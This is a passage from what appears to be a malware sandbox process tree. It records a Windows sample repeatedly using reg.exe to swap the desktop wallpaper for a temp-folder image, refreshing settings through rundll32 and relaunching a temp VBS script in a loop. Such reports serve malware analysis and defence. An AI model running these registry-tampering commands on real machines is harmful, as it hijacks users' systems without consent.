        5⤵
        
        PID:2904
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3796
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4580
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4592
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3748
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2244
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:4380
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4468
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3068
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1124
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1908
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:484
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3604
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4112
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4492
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3960
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1780
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:424
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3660
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4228
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4212
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3372
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:1528
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4548
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2228
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3784
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4536
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3036
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:3748
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2244
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3164
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2436
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1716
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5468
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:5776
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5796
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5836
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5852
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5864
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5880
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:5900
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5908
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5940
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5952
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5964
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5976
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:5992
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:6000
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:6036
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6052
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6064
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6076
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6092
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:6100
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:6140
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3544
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3036
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5692
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:5732
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1056
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5844
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5860
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5864
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5888
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:5908
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5944
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5968
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5976
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6000
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6036
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6068
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:6080
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3164
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2256
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6136
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3036
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:5524
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5728
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3544
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6132
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5708
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3036
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:4464
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5940
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3164
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6132
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5708
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5804
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:5940
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6136
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5708
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5844
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5284
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5952
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:5844
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3036
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3036
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6156
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6168
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6180
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6196
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6208
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6232
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6400
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6412
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6424
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6440
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6452
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6472
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6492
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6508
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6520
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6536
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6548
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6572
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6588
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6600
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6612
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6628
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6636
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6668
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6680
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6692
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6704
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6736
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6760
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6772
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6784
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6864
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6964
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6980
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6996
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7016
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7032
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7044
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7060
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7072
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7092
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7112
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7124
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7136
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7152
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6148
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6172
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6184
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6180
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6208
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6220
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6284
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6416
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6428
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6424
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6452
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6524
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6772
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6784
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6832
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6808
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6880
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6984
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6996
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7040
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7056
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7076
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7116
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7132
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6436
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6472
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5672
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6988
